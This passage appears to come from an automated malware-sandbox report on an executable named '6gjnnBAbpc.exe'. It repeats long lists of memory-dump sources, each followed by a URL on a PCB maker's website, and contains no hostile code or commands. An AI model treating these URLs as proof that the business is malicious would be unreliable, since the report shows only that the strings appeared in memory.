6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/parts/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-and-schematic-design/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-assembly-quote/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-production-quote/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/stencil-quote/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/an-introduction-to-high-density-interconnect-hdi-pcbs/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/components-parts/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/customized-cable/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/enclosure/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/fpc-flexible-printed-circuits/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/hdipcb/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 